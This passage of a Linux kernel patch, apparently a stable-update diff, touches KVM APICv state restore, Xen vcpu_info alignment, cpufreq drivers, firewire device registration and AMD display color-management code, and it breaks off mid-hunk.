+ KVM_X86_OP_OPTIONAL(pi_start_assignment)
++KVM_X86_OP_OPTIONAL(apicv_pre_state_restore)
+ KVM_X86_OP_OPTIONAL(apicv_post_state_restore)
+ KVM_X86_OP_OPTIONAL_RET0(dy_apicv_has_pending_interrupt)
+ KVM_X86_OP_OPTIONAL(set_hv_timer)
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index c1dcaa3d2d6eb..dfcdcafe3a2cd 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1603,6 +1603,7 @@ struct kvm_x86_ops {
+ 	int (*pi_update_irte)(struct kvm *kvm, unsigned int host_irq,
+ 			      uint32_t guest_irq, bool set);
+ 	void (*pi_start_assignment)(struct kvm *kvm);
++	void (*apicv_pre_state_restore)(struct kvm_vcpu *vcpu);
+ 	void (*apicv_post_state_restore)(struct kvm_vcpu *vcpu);
+ 	bool (*dy_apicv_has_pending_interrupt)(struct kvm_vcpu *vcpu);
+ 
+diff --git a/arch/x86/kernel/apic/msi.c b/arch/x86/kernel/apic/msi.c
+index 7517eb05bdc1a..ab348aec86632 100644
+--- a/arch/x86/kernel/apic/msi.c
++++ b/arch/x86/kernel/apic/msi.c
+@@ -55,14 +55,14 @@ msi_set_affinity(struct irq_data *irqd, const struct cpumask *mask, bool force)
+ 	 * caused by the non-atomic update of the address/data pair.
+ 	 *
+ 	 * Direct update is possible when:
+-	 * - The MSI is maskable (remapped MSI does not use this code path)).
+-	 *   The quirk bit is not set in this case.
++	 * - The MSI is maskable (remapped MSI does not use this code path).
++	 *   The reservation mode bit is set in this case.
+ 	 * - The new vector is the same as the old vector
+ 	 * - The old vector is MANAGED_IRQ_SHUTDOWN_VECTOR (interrupt starts up)
+ 	 * - The interrupt is not yet started up
+ 	 * - The new destination CPU is the same as the old destination CPU
+ 	 */
+-	if (!irqd_msi_nomask_quirk(irqd) ||
++	if (!irqd_can_reserve(irqd) ||
+ 	    cfg->vector == old_cfg.vector ||
+ 	    old_cfg.vector == MANAGED_IRQ_SHUTDOWN_VECTOR ||
+ 	    !irqd_is_started(irqd) ||
+@@ -202,8 +202,6 @@ struct irq_domain * __init native_create_pci_msi_domain(void)
+ 	if (!d) {
+ 		irq_domain_free_fwnode(fn);
+ 		pr_warn("Failed to initialize PCI-MSI irqdomain.\n");
+-	} else {
+-		d->flags |= IRQ_DOMAIN_MSI_NOMASK_QUIRK;
+ 	}
+ 	return d;
+ }
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index 4dba0a84ba2f3..edcf45e312b99 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2446,6 +2446,8 @@ void kvm_lapic_reset(struct kvm_vcpu *vcpu, bool init_event)
+ 	u64 msr_val;
+ 	int i;
+ 
++	static_call_cond(kvm_x86_apicv_pre_state_restore)(vcpu);
++
+ 	if (!init_event) {
+ 		msr_val = APIC_DEFAULT_PHYS_BASE | MSR_IA32_APICBASE_ENABLE;
+ 		if (kvm_vcpu_is_reset_bsp(vcpu))
+@@ -2757,6 +2759,8 @@ int kvm_apic_set_state(struct kvm_vcpu *vcpu, struct kvm_lapic_state *s)
+ 	struct kvm_lapic *apic = vcpu->arch.apic;
+ 	int r;
+ 
++	static_call_cond(kvm_x86_apicv_pre_state_restore)(vcpu);
++
+ 	kvm_lapic_set_base(vcpu, vcpu->arch.apic_base);
+ 	/* set SPIV separately to get count of SW disabled APICs right */
+ 	apic_set_spiv(apic, *((u32 *)(s->regs + APIC_SPIV)));
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 31a10d774df6d..98d732b9418f1 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -6799,7 +6799,7 @@ static void vmx_load_eoi_exitmap(struct kvm_vcpu *vcpu, u64 *eoi_exit_bitmap)
+ 	vmcs_write64(EOI_EXIT_BITMAP3, eoi_exit_bitmap[3]);
+ }
+ 
+-static void vmx_apicv_post_state_restore(struct kvm_vcpu *vcpu)
++static void vmx_apicv_pre_state_restore(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_vmx *vmx = to_vmx(vcpu);
+ 
+@@ -8172,7 +8172,7 @@ static struct kvm_x86_ops vmx_x86_ops __initdata = {
+ 	.set_apic_access_page_addr = vmx_set_apic_access_page_addr,
+ 	.refresh_apicv_exec_ctrl = vmx_refresh_apicv_exec_ctrl,
+ 	.load_eoi_exitmap = vmx_load_eoi_exitmap,
+-	.apicv_post_state_restore = vmx_apicv_post_state_restore,
++	.apicv_pre_state_restore = vmx_apicv_pre_state_restore,
+ 	.check_apicv_inhibit_reasons = vmx_check_apicv_inhibit_reasons,
+ 	.hwapic_irr_update = vmx_hwapic_irr_update,
+ 	.hwapic_isr_update = vmx_hwapic_isr_update,
+diff --git a/arch/x86/xen/enlighten.c b/arch/x86/xen/enlighten.c
+index b8db2148c07d5..3c61bb98c10e2 100644
+--- a/arch/x86/xen/enlighten.c
++++ b/arch/x86/xen/enlighten.c
+@@ -32,10 +32,13 @@ EXPORT_SYMBOL_GPL(hypercall_page);
+  * &HYPERVISOR_shared_info->vcpu_info[cpu]. See xen_hvm_init_shared_info
+  * and xen_vcpu_setup for details. By default it points to share_info->vcpu_info
+  * but during boot it is switched to point to xen_vcpu_info.
+- * The pointer is used in __xen_evtchn_do_upcall to acknowledge pending events.
++ * The pointer is used in xen_evtchn_do_upcall to acknowledge pending events.
++ * Make sure that xen_vcpu_info doesn't cross a page boundary by making it
++ * cache-line aligned (the struct is guaranteed to have a size of 64 bytes,
++ * which matches the cache line size of 64-bit x86 processors).
+  */
+ DEFINE_PER_CPU(struct vcpu_info *, xen_vcpu);
+-DEFINE_PER_CPU(struct vcpu_info, xen_vcpu_info);
++DEFINE_PER_CPU_ALIGNED(struct vcpu_info, xen_vcpu_info);
+ 
+ /* Linux <-> Xen vCPU id mapping */
+ DEFINE_PER_CPU(uint32_t, xen_vcpu_id);
+@@ -160,6 +163,7 @@ void xen_vcpu_setup(int cpu)
+ 	int err;
+ 	struct vcpu_info *vcpup;
+ 
++	BUILD_BUG_ON(sizeof(*vcpup) > SMP_CACHE_BYTES);
+ 	BUG_ON(HYPERVISOR_shared_info == &xen_dummy_shared_info);
+ 
+ 	/*
+diff --git a/arch/x86/xen/enlighten_hvm.c b/arch/x86/xen/enlighten_hvm.c
+index c1cd28e915a3a..c66807dd02703 100644
+--- a/arch/x86/xen/enlighten_hvm.c
++++ b/arch/x86/xen/enlighten_hvm.c
+@@ -136,7 +136,7 @@ DEFINE_IDTENTRY_SYSVEC(sysvec_xen_hvm_callback)
+ 
+ 	inc_irq_stat(irq_hv_callback_count);
+ 
+-	xen_hvm_evtchn_do_upcall();
++	xen_evtchn_do_upcall();
+ 
+ 	set_irq_regs(old_regs);
+ }
+diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
+index a10903785a338..b2b2f4315b78d 100644
+--- a/arch/x86/xen/xen-ops.h
++++ b/arch/x86/xen/xen-ops.h
+@@ -21,7 +21,7 @@ extern void *xen_initial_gdt;
+ struct trap_info;
+ void xen_copy_trap_info(struct trap_info *traps);
+ 
+-DECLARE_PER_CPU(struct vcpu_info, xen_vcpu_info);
++DECLARE_PER_CPU_ALIGNED(struct vcpu_info, xen_vcpu_info);
+ DECLARE_PER_CPU(unsigned long, xen_cr3);
+ DECLARE_PER_CPU(unsigned long, xen_current_cr3);
+ 
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index e614eb3355d39..a9da2f05e6297 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -1086,9 +1086,14 @@ int ata_scsi_dev_config(struct scsi_device *sdev, struct ata_device *dev)
+ 		 * Ask the sd driver to issue START STOP UNIT on runtime suspend
+ 		 * and resume and shutdown only. For system level suspend/resume,
+ 		 * devices power state is handled directly by libata EH.
++		 * Given that disks are always spun up on system resume, also
++		 * make sure that the sd driver forces runtime suspended disks
++		 * to be resumed to correctly reflect the power state of the
++		 * device.
+ 		 */
+-		sdev->manage_runtime_start_stop = true;
+-		sdev->manage_shutdown = true;
++		sdev->manage_runtime_start_stop = 1;
++		sdev->manage_shutdown = 1;
++		sdev->force_runtime_start_on_system_start = 1;
+ 	}
+ 
+ 	/*
+diff --git a/drivers/auxdisplay/hd44780_common.c b/drivers/auxdisplay/hd44780_common.c
+index 3934c2eebf33d..7cbf375b0fa5e 100644
+--- a/drivers/auxdisplay/hd44780_common.c
++++ b/drivers/auxdisplay/hd44780_common.c
+@@ -82,7 +82,15 @@ int hd44780_common_clear_display(struct charlcd *lcd)
+ 	hdc->write_cmd(hdc, LCD_CMD_DISPLAY_CLEAR);
+ 	/* datasheet says to wait 1,64 milliseconds */
+ 	long_sleep(2);
+-	return 0;
++
++	/*
++	 * The Hitachi HD44780 controller (and compatible ones) reset the DDRAM
++	 * address when executing the DISPLAY_CLEAR command, thus the
++	 * following call is not required. However, other controllers do not
++	 * (e.g. NewHaven NHD-0220DZW-AG5), thus move the cursor to home
++	 * unconditionally to support both.
++	 */
++	return hd44780_common_home(lcd);
+ }
+ EXPORT_SYMBOL_GPL(hd44780_common_clear_display);
+ 
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index f8d2bba9173d8..edc294ee5a5bc 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -296,7 +296,9 @@ static int amd_pstate_target(struct cpufreq_policy *policy,
+ static unsigned int amd_pstate_fast_switch(struct cpufreq_policy *policy,
+ 				  unsigned int target_freq)
+ {
+-	return amd_pstate_update_freq(policy, target_freq, true);
++	if (!amd_pstate_update_freq(policy, target_freq, true))
++		return target_freq;
++	return policy->cur;
+ }
+ 
+ static void amd_pstate_adjust_perf(unsigned int cpu,
+diff --git a/drivers/cpufreq/imx6q-cpufreq.c b/drivers/cpufreq/imx6q-cpufreq.c
+index ad4ce84931446..925fc17eaacb2 100644
+--- a/drivers/cpufreq/imx6q-cpufreq.c
++++ b/drivers/cpufreq/imx6q-cpufreq.c
+@@ -209,6 +209,14 @@ static struct cpufreq_driver imx6q_cpufreq_driver = {
+ 	.suspend = cpufreq_generic_suspend,
+ };
+ 
++static void imx6x_disable_freq_in_opp(struct device *dev, unsigned long freq)
++{
++	int ret = dev_pm_opp_disable(dev, freq);
++
++	if (ret < 0 && ret != -ENODEV)
++		dev_warn(dev, "failed to disable %ldMHz OPP\n", freq / 1000000);
++}
++
+ #define OCOTP_CFG3			0x440
+ #define OCOTP_CFG3_SPEED_SHIFT		16
+ #define OCOTP_CFG3_SPEED_1P2GHZ		0x3
+@@ -254,17 +262,15 @@ static int imx6q_opp_check_speed_grading(struct device *dev)
+ 	val &= 0x3;
+ 
+ 	if (val < OCOTP_CFG3_SPEED_996MHZ)
+-		if (dev_pm_opp_disable(dev, 996000000))
+-			dev_warn(dev, "failed to disable 996MHz OPP\n");
++		imx6x_disable_freq_in_opp(dev, 996000000);
+ 
+ 	if (of_machine_is_compatible("fsl,imx6q") ||
+ 	    of_machine_is_compatible("fsl,imx6qp")) {
+ 		if (val != OCOTP_CFG3_SPEED_852MHZ)
+-			if (dev_pm_opp_disable(dev, 852000000))
+-				dev_warn(dev, "failed to disable 852MHz OPP\n");
++			imx6x_disable_freq_in_opp(dev, 852000000);
++
+ 		if (val != OCOTP_CFG3_SPEED_1P2GHZ)
+-			if (dev_pm_opp_disable(dev, 1200000000))
+-				dev_warn(dev, "failed to disable 1.2GHz OPP\n");
++			imx6x_disable_freq_in_opp(dev, 1200000000);
+ 	}
+ 
+ 	return 0;
+@@ -316,20 +322,16 @@ static int imx6ul_opp_check_speed_grading(struct device *dev)
+ 	val >>= OCOTP_CFG3_SPEED_SHIFT;
+ 	val &= 0x3;
+ 
+-	if (of_machine_is_compatible("fsl,imx6ul")) {
++	if (of_machine_is_compatible("fsl,imx6ul"))
+ 		if (val != OCOTP_CFG3_6UL_SPEED_696MHZ)
+-			if (dev_pm_opp_disable(dev, 696000000))
+-				dev_warn(dev, "failed to disable 696MHz OPP\n");
+-	}
++			imx6x_disable_freq_in_opp(dev, 696000000);
+ 
+ 	if (of_machine_is_compatible("fsl,imx6ull")) {
+-		if (val != OCOTP_CFG3_6ULL_SPEED_792MHZ)
+-			if (dev_pm_opp_disable(dev, 792000000))
+-				dev_warn(dev, "failed to disable 792MHz OPP\n");
++		if (val < OCOTP_CFG3_6ULL_SPEED_792MHZ)
++			imx6x_disable_freq_in_opp(dev, 792000000);
+ 
+ 		if (val != OCOTP_CFG3_6ULL_SPEED_900MHZ)
+-			if (dev_pm_opp_disable(dev, 900000000))
+-				dev_warn(dev, "failed to disable 900MHz OPP\n");
++			imx6x_disable_freq_in_opp(dev, 900000000);
+ 	}
+ 
+ 	return ret;
+diff --git a/drivers/dma-buf/dma-resv.c b/drivers/dma-buf/dma-resv.c
+index f1ba71aed33c3..e78ff9333c7a3 100644
+--- a/drivers/dma-buf/dma-resv.c
++++ b/drivers/dma-buf/dma-resv.c
+@@ -296,7 +296,7 @@ void dma_resv_add_fence(struct dma_resv *obj, struct dma_fence *fence,
+ 
+ 		dma_resv_list_entry(fobj, i, obj, &old, &old_usage);
+ 		if ((old->context == fence->context && old_usage >= usage &&
+-		     dma_fence_is_later(fence, old)) ||
++		     dma_fence_is_later_or_same(fence, old)) ||
+ 		    dma_fence_is_signaled(old)) {
+ 			dma_resv_list_set(fobj, i, fence, usage);
+ 			dma_fence_put(old);
+diff --git a/drivers/firewire/core-device.c b/drivers/firewire/core-device.c
+index adddd8c45d0c1..74bab06283b71 100644
+--- a/drivers/firewire/core-device.c
++++ b/drivers/firewire/core-device.c
+@@ -717,14 +717,11 @@ static void create_units(struct fw_device *device)
+ 					fw_unit_attributes,
+ 					&unit->attribute_group);
+ 
+-		if (device_register(&unit->device) < 0)
+-			goto skip_unit;
+-
+ 		fw_device_get(device);
+-		continue;
+-
+-	skip_unit:
+-		kfree(unit);
++		if (device_register(&unit->device) < 0) {
++			put_device(&unit->device);
++			continue;
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/firewire/sbp2.c b/drivers/firewire/sbp2.c
+index 7ad2e03afd4e5..234cd17fdee13 100644
+--- a/drivers/firewire/sbp2.c
++++ b/drivers/firewire/sbp2.c
+@@ -1519,9 +1519,9 @@ static int sbp2_scsi_slave_configure(struct scsi_device *sdev)
+ 	sdev->use_10_for_rw = 1;
+ 
+ 	if (sbp2_param_exclusive_login) {
+-		sdev->manage_system_start_stop = true;
+-		sdev->manage_runtime_start_stop = true;
+-		sdev->manage_shutdown = true;
++		sdev->manage_system_start_stop = 1;
++		sdev->manage_runtime_start_stop = 1;
++		sdev->manage_shutdown = 1;
+ 	}
+ 
+ 	if (sdev->type == TYPE_ROM)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 6e5bc74846952..b9983ca99eb7d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2200,6 +2200,8 @@ retry_init:
+ 		pm_runtime_mark_last_busy(ddev->dev);
+ 		pm_runtime_put_autosuspend(ddev->dev);
+ 
++		pci_wake_from_d3(pdev, TRUE);
++
+ 		/*
+ 		 * For runpm implemented via BACO, PMFW will handle the
+ 		 * timing for BACO in and out:
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index bc65fc1350f9a..23e7e5126eae6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -82,6 +82,10 @@ MODULE_FIRMWARE("amdgpu/gc_11_0_4_me.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_4_mec.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_4_rlc.bin");
+ 
++static const struct soc15_reg_golden golden_settings_gc_11_0[] = {
++	SOC15_REG_GOLDEN_VALUE(GC, 0, regTCP_CNTL, 0x20000000, 0x20000000)
++};
++
+ static const struct soc15_reg_golden golden_settings_gc_11_0_1[] =
+ {
+ 	SOC15_REG_GOLDEN_VALUE(GC, 0, regCGTT_GS_NGG_CLK_CTRL, 0x9fff8fff, 0x00000010),
+@@ -274,6 +278,10 @@ static void gfx_v11_0_init_golden_registers(struct amdgpu_device *adev)
+ 	default:
+ 		break;
+ 	}
++	soc15_program_register_sequence(adev,
++					golden_settings_gc_11_0,
++					(const u32)ARRAY_SIZE(golden_settings_gc_11_0));
++
+ }
+ 
+ static void gfx_v11_0_write_data_to_reg(struct amdgpu_ring *ring, int eng_sel,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 001932cb813dc..6d5f3c5fb4a62 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6149,7 +6149,7 @@ int amdgpu_dm_connector_atomic_set_property(struct drm_connector *connector,
+ 		dm_new_state->underscan_enable = val;
+ 		ret = 0;
+ 	} else if (property == adev->mode_info.abm_level_property) {
+-		dm_new_state->abm_level = val;
++		dm_new_state->abm_level = val ?: ABM_LEVEL_IMMEDIATE_DISABLE;
+ 		ret = 0;
+ 	}
+ 
+@@ -6194,7 +6194,8 @@ int amdgpu_dm_connector_atomic_get_property(struct drm_connector *connector,
+ 		*val = dm_state->underscan_enable;
+ 		ret = 0;
+ 	} else if (property == adev->mode_info.abm_level_property) {
+-		*val = dm_state->abm_level;
++		*val = (dm_state->abm_level != ABM_LEVEL_IMMEDIATE_DISABLE) ?
++			dm_state->abm_level : 0;
+ 		ret = 0;
+ 	}
+ 
+@@ -6274,7 +6275,8 @@ void amdgpu_dm_connector_funcs_reset(struct drm_connector *connector)
+ 		state->pbn = 0;
+ 
+ 		if (connector->connector_type == DRM_MODE_CONNECTOR_eDP)
+-			state->abm_level = amdgpu_dm_abm_level;
++			state->abm_level = amdgpu_dm_abm_level ?:
++				ABM_LEVEL_IMMEDIATE_DISABLE;
+ 
+ 		__drm_atomic_helper_connector_reset(connector, &state->base);
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index f773a467fef54..7e775cec06927 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -499,9 +499,12 @@ enum dcn_zstate_support_state {
+ 	DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY,
+ 	DCN_ZSTATE_SUPPORT_DISALLOW,
+ };
+-/*
+- * For any clocks that may differ per pipe
+- * only the max is stored in this structure
++
++/**
++ * dc_clocks - DC pipe clocks
++ *
++ * For any clocks that may differ per pipe only the max is stored in this
++ * structure
+  */
+ struct dc_clocks {
+ 	int dispclk_khz;
+@@ -528,6 +531,16 @@ struct dc_clocks {
+ 	bool prev_p_state_change_support;
+ 	bool fclk_prev_p_state_change_support;
+ 	int num_ways;
++
++	/**
++	 * @fw_based_mclk_switching
++	 *
++	 * DC has a mechanism that leverage the variable refresh rate to switch
++	 * memory clock in cases that we have a large latency to achieve the
++	 * memory clock change and a short vblank window. DC has some
++	 * requirements to enable this feature, and this field describes if the
++	 * system support or not such a feature.
++	 */
+ 	bool fw_based_mclk_switching;
+ 	bool fw_based_mclk_switching_shut_down;
+ 	int prev_num_ways;
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_stream.h b/drivers/gpu/drm/amd/display/dc/dc_stream.h
+index 364ff913527d8..31c6a80c216ff 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_stream.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_stream.h
+@@ -202,7 +202,18 @@ struct dc_stream_state {
+ 	bool use_vsc_sdp_for_colorimetry;
+ 	bool ignore_msa_timing_param;
+ 
++	/**
++	 * @allow_freesync:
++	 *
++	 * It say if Freesync is enabled or not.
++	 */
+ 	bool allow_freesync;
++
++	/**
++	 * @vrr_active_variable:
++	 *
++	 * It describes if VRR is in use.
++	 */
+ 	bool vrr_active_variable;
+ 	bool freesync_on_desktop;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
+index 7a00fe525dfba..3538973bd0c6c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
+@@ -308,7 +308,10 @@ bool cm_helper_convert_to_custom_float(
+ #define NUMBER_REGIONS     32
+ #define NUMBER_SW_SEGMENTS 16
+ 
+-bool cm_helper_translate_curve_to_hw_format(
++#define DC_LOGGER \
++		ctx->logger
++
++bool cm_helper_translate_curve_to_hw_format(struct dc_context *ctx,
+ 				const struct dc_transfer_func *output_tf,
+ 				struct pwl_params *lut_params, bool fixpoint)
+ {
+@@ -482,10 +485,18 @@ bool cm_helper_translate_curve_to_hw_format(
+ 		rgb->delta_green = dc_fixpt_sub(rgb_plus_1->green, rgb->green);
+ 		rgb->delta_blue  = dc_fixpt_sub(rgb_plus_1->blue,  rgb->blue);
+ 
++
+ 		if (fixpoint == true) {
+-			rgb->delta_red_reg   = dc_fixpt_clamp_u0d10(rgb->delta_red);
+-			rgb->delta_green_reg = dc_fixpt_clamp_u0d10(rgb->delta_green);
+-			rgb->delta_blue_reg  = dc_fixpt_clamp_u0d10(rgb->delta_blue);
++			uint32_t red_clamp = dc_fixpt_clamp_u0d14(rgb->delta_red);
++			uint32_t green_clamp = dc_fixpt_clamp_u0d14(rgb->delta_green);
++			uint32_t blue_clamp = dc_fixpt_clamp_u0d14(rgb->delta_blue);
++
++			if (red_clamp >> 10 || green_clamp >> 10 || blue_clamp >> 10)
++				DC_LOG_WARNING("Losing delta precision while programming shaper LUT.");
++
++			rgb->delta_red_reg   = red_clamp & 0x3ff;
++			rgb->delta_green_reg = green_clamp & 0x3ff;
++			rgb->delta_blue_reg  = blue_clamp & 0x3ff;
+ 			rgb->red_reg         = dc_fixpt_clamp_u0d14(rgb->red);
+ 			rgb->green_reg       = dc_fixpt_clamp_u0d14(rgb->green);
+ 			rgb->blue_reg        = dc_fixpt_clamp_u0d14(rgb->blue);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.h b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.h
+index 3b8cd7410498a..0a68b63d61260 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.h
+@@ -106,6 +106,7 @@ bool cm_helper_convert_to_custom_float(
+ 		bool fixpoint);
+ 
+ bool cm_helper_translate_curve_to_hw_format(
++		struct dc_context *ctx,
+ 		const struct dc_transfer_func *output_tf,
+ 		struct pwl_params *lut_params, bool fixpoint);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 3940271189632..d84579da64003 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -1867,7 +1867,7 @@ bool dcn10_set_output_transfer_func(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ 	/* dcn10_translate_regamma_to_hw_format takes 750us, only do it when full
+ 	 * update.
+ 	 */
+-	else if (cm_helper_translate_curve_to_hw_format(
++	else if (cm_helper_translate_curve_to_hw_format(dc->ctx,
+ 			stream->out_transfer_func,
+ 			&dpp->regamma_params, false)) {
+ 		dpp->funcs->dpp_program_regamma_pwl(
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index fbc188812ccc9..9bd6a5716cdc1 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -843,7 +843,7 @@ bool dcn20_set_output_transfer_func(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ 			params = &stream->out_transfer_func->pwl;
+ 		else if (pipe_ctx->stream->out_transfer_func->type ==
+ 			TF_TYPE_DISTRIBUTED_POINTS &&
+-			cm_helper_translate_curve_to_hw_format(
++			cm_helper_translate_curve_to_hw_format(dc->ctx,
+ 			stream->out_transfer_func,
+ 			&mpc->blender_params, false))
+ 			params = &mpc->blender_params;
+@@ -872,7 +872,7 @@ bool dcn20_set_blend_lut(
+ 		if (plane_state->blend_tf->type == TF_TYPE_HWPWL)
+ 			blend_lut = &plane_state->blend_tf->pwl;
+ 		else if (plane_state->blend_tf->type == TF_TYPE_DISTRIBUTED_POINTS) {
+-			cm_helper_translate_curve_to_hw_format(
++			cm_helper_translate_curve_to_hw_format(plane_state->ctx,
+ 					plane_state->blend_tf,
+ 					&dpp_base->regamma_params, false);
+ 			blend_lut = &dpp_base->regamma_params;
+@@ -894,7 +894,7 @@ bool dcn20_set_shaper_3dlut(
+ 		if (plane_state->in_shaper_func->type == TF_TYPE_HWPWL)
+ 			shaper_lut = &plane_state->in_shaper_func->pwl;
+ 		else if (plane_state->in_shaper_func->type == TF_TYPE_DISTRIBUTED_POINTS) {
+-			cm_helper_translate_curve_to_hw_format(
++			cm_helper_translate_curve_to_hw_format(plane_state->ctx,
+ 					plane_state->in_shaper_func,
+ 					&dpp_base->shaper_params, true);
+ 			shaper_lut = &dpp_base->shaper_params;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dwb_cm.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dwb_cm.c
+index 6a3d3a0ec0a36..701c7d8bc038a 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dwb_cm.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dwb_cm.c
+@@ -280,7 +280,7 @@ bool dwb3_ogam_set_input_transfer_func(
+ 	dwb_ogam_lut = kzalloc(sizeof(*dwb_ogam_lut), GFP_KERNEL);
+ 
+ 	if (dwb_ogam_lut) {
+-		cm_helper_translate_curve_to_hw_format(
++		cm_helper_translate_curve_to_hw_format(dwbc->ctx,
+ 			in_transfer_func_dwb_ogam,
+ 			dwb_ogam_lut, false);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index a1b312483d7f1..53262f6bc40b0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -91,8 +91,8 @@ bool dcn30_set_blend_lut(
+ 	return result;
+ }
+ 
+-static bool dcn30_set_mpc_shaper_3dlut(
+-	struct pipe_ctx *pipe_ctx, const struct dc_stream_state *stream)
++static bool dcn30_set_mpc_shaper_3dlut(struct pipe_ctx *pipe_ctx,
++				       const struct dc_stream_state *stream)
+ {
+ 	struct dpp *dpp_base = pipe_ctx->plane_res.dpp;
+ 	int mpcc_id = pipe_ctx->plane_res.hubp->inst;
+@@ -104,19 +104,18 @@ static bool dcn30_set_mpc_shaper_3dlut(
+ 	const struct pwl_params *shaper_lut = NULL;
+ 	//get the shaper lut params
+ 	if (stream->func_shaper) {
+-		if (stream->func_shaper->type == TF_TYPE_HWPWL)
++		if (stream->func_shaper->type == TF_TYPE_HWPWL) {
+ 			shaper_lut = &stream->func_shaper->pwl;
+-		else if (stream->func_shaper->type == TF_TYPE_DISTRIBUTED_POINTS) {
+-			cm_helper_translate_curve_to_hw_format(
+-					stream->func_shaper,
+-					&dpp_base->shaper_params, true);
++		} else if (stream->func_shaper->type == TF_TYPE_DISTRIBUTED_POINTS) {
++			cm_helper_translate_curve_to_hw_format(stream->ctx, stream->func_shaper,
++							       &dpp_base->shaper_params, true);
+ 			shaper_lut = &dpp_base->shaper_params;
+ 		}
+ 	}
+ 
+ 	if (stream->lut3d_func &&
+-		stream->lut3d_func->state.bits.initialized == 1 &&
+-		stream->lut3d_func->state.bits.rmu_idx_valid == 1) {
++	    stream->lut3d_func->state.bits.initialized == 1 &&
++	    stream->lut3d_func->state.bits.rmu_idx_valid == 1) {
+ 		if (stream->lut3d_func->state.bits.rmu_mux_num == 0)
+ 			mpcc_id_projected = stream->lut3d_func->state.bits.mpc_rmu0_mux;
+ 		else if (stream->lut3d_func->state.bits.rmu_mux_num == 1)
+@@ -125,20 +124,22 @@ static bool dcn30_set_mpc_shaper_3dlut(
+ 			mpcc_id_projected = stream->lut3d_func->state.bits.mpc_rmu2_mux;
+ 		if (mpcc_id_projected != mpcc_id)
+ 			BREAK_TO_DEBUGGER();
+-		/*find the reason why logical layer assigned a differant mpcc_id into acquire_post_bldn_3dlut*/
++		/* find the reason why logical layer assigned a different
++		 * mpcc_id into acquire_post_bldn_3dlut
++		 */
+ 		acquired_rmu = mpc->funcs->acquire_rmu(mpc, mpcc_id,
